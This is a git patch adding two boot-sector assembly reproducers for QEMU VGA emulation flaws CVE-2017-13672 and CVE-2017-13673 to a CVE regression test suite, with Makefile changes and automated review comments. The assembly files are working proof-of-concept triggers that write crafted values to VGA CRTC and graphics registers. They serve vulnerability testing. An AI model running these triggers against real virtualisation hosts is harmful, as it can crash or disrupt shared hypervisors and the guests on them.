From 2339ec544399cd66930643817ba1cb1094ddccfa Mon Sep 17 00:00:00 2001
From: Gerd Hoffmann
Date: Wed, 30 Aug 2017 15:54:02 +0200
Subject: add cve-2017-13672 + cve-2017-13673 reproducers

---
 .gitignore              |  1 +
 Makefile                |  6 +++++-
 boot-cve-2017-13672.asm | 25 ++++++++++++++++++++++++
 boot-cve-2017-13673.asm | 51 +++++++++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 82 insertions(+), 1 deletion(-)
 create mode 100644 boot-cve-2017-13672.asm
 create mode 100644 boot-cve-2017-13673.asm

diff --git a/.gitignore b/.gitignore
index 20225f6..8ddcd7c 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 cve-[0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9]
+boot-*.raw
 *.o
 *~
diff --git a/Makefile b/Makefile
index ac72595..1232fee 100644
--- a/Makefile
+++ b/Makefile
@@ -6,7 +6,8 @@ CFLAGS += -Wall
 CVETEST := cve-2016-3712
 PCITEST := cve-2017-2615 cve-2017-2620
 USBTEST := cve-2017-5898
-TARGETS := $(CVETEST) $(PCITEST) $(USBTEST)
+RAWTEST := boot-cve-2017-13672.raw boot-cve-2017-13673.raw
+TARGETS := $(CVETEST) $(PCITEST) $(USBTEST) $(RAWTEST)
 DEPENDS := libpci libusb-1.0
 
 $(PCITEST) : CFLAGS += $(shell pkg-config --cflags libpci)
@@ -40,6 +41,9 @@ clean:
 	rm -f $(TARGETS)
 	rm -f *~ *.o
 
+boot-%.raw: boot-%.asm
+	nasm -o $@ $<
+
 cve-2017-2615: cve-2017-2615.o pci.o cirrus.o
 cve-2017-2620: cve-2017-2620.o pci.o cirrus.o
 cve-2017-5898: cve-2017-5898.o usb.o
diff --git a/boot-cve-2017-13672.asm b/boot-cve-2017-13672.asm
new file mode 100644
index 0000000..2d9ca9d
--- /dev/null
+++ b/boot-cve-2017-13672.asm
@@ -0,0 +1,25 @@
+; From: David Buchanan
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+	BITS 16
+
+	ORG 0x7C00
+
+	mov ax, 0x4F02
+	mov bx, 0x4118 ; 1024x768x24, LFB enabled
+	int 0x10 ; init VESA graphics via BIOS
+
+	mov dx, 0x3d4
+	mov al, 0x1d
+	out dx, al
+
+	mov dx, 0x3d5
+	in al, dx
+	or al, 0x80
+	out dx, al
+
+	jmp $
+
+	TIMES 510-($-$$) DB 0
+	DW 0xAA55 ; boot signature
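Review bot: The new `boot-%.raw` rule hard-codes the assembler in `nasm -o $@ $<`, so unlike `CC`/`CFLAGS` it cannot be pointed at a different nasm binary from the command line, and nothing records nasm as a build requirement next to `DEPENDS := libpci libusb-1.0` (that variable is presumably consumed by a pkg-config check elsewhere in the file, which cannot express a tool dependency). Suggest `NASM ?= nasm` beside the other variables and `$(NASM) -f bin -o $@ $<` as the recipe; `-f bin` is nasm's default, but spelling it out documents that the output is a flat boot sector rather than an object file. Placing the pattern rule between `clean:` and the per-test link rules also reads oddly — grouping it with the other build rules would help. Since `TARGETS` now includes `RAWTEST`, the existing `rm -f $(TARGETS)` line already cleans the .raw files, which is fine.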
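Review bot: The VESA mode-set status is never checked after `int 0x10`: VBE function 0x4F02 reports success with AX=0x004F, and if the guest VGA BIOS does not offer mode 0x118 the code falls through to the CRTC writes still in text mode and the run is inconclusive rather than visibly failed. A `cmp ax, 0x004F` and `jne fail` after the `int 0x10`, with `fail:` being a `hlt` loop distinct from the final `jmp $`, would let a harness tell "mode set failed" from the intended end state. The write to CRTC index `0x1d` is also the only register access in either new file without a label comment — the sibling boot-cve-2017-13673.asm annotates every index — so a short comment naming the register would make clear which emulated state this reproducer exercises. The header comment should additionally state the CVE id and the expected observable outcome (qemu crash/assert vs. the guest simply hanging in `jmp $`), since both affected and fixed QEMU otherwise end in the same spin loop and the .raw cannot be scripted with a timeout without that information.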
diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm
new file mode 100644
index 0000000..21d5f3d
--- /dev/null
+++ b/boot-cve-2017-13673.asm
@@ -0,0 +1,51 @@
+; From: David Buchanan
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+	BITS 16
+
+	ORG 0x7C00
+
+	mov dx, 0x3d4 ; start_addr high byte
+	mov al, 0x0c
+	out dx, al
+
+	mov dx, 0x3d5
+	mov al, 0xff
+	out dx, al
+
+
+	mov dx, 0x3d4 ; line_compare
+	mov al, 0x07
+	out dx, al
+
+	mov dx, 0x3d5
+	in al, dx
+	and al, ~0x10
+	out dx, al
+
+
+	mov dx, 0x3d4 ; line_compare
+	mov al, 0x09
+	out dx, al
+
+	mov dx, 0x3d5
+	in al, dx
+	and al, ~0x40
+	out dx, al
+
+
+	mov dx, 0x3ce ; gfx mode
+	mov al, 0x06
+	out dx, al
+
+	mov dx, 0x3cf
+	mov al, 0x01
+	out dx, al
+
+
+	jmp $
+
+	TIMES 510-($-$$) DB 0
+	DW 0xAA55 ; boot signature
-- 
cgit
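Review bot: The header comment is copied verbatim from boot-cve-2017-13672.asm and says neither which CVE this file reproduces nor what the observable result should be, so a harness running the .raw cannot distinguish "bug present" from "bug fixed" — both end in the `jmp $` spin loop. Suggest a line such as `; CVE-2017-13673: affected qemu <expected failure mode from the advisory>; fixed qemu keeps running` with the placeholder filled in, mirrored in the sibling file. The final `jmp $` also busy-spins the vCPU for as long as the test runs; a `hlt` under a label with a jump back to it (`.halt: hlt` / `jmp .halt`) idles the guest instead, which presumably does not affect the display-update path being exercised since that runs on QEMU's refresh timer rather than guest instructions — worth confirming before changing it. The two `; line_compare` comments on the `0x07` and `0x09` CRTC writes are consistent with those registers holding the high line-compare bits but read as a copy-paste; naming the bit each `and` clears (bit 4 via `~0x10` on CR7, bit 6 via `~0x40` on CR9) would make the intent explicit.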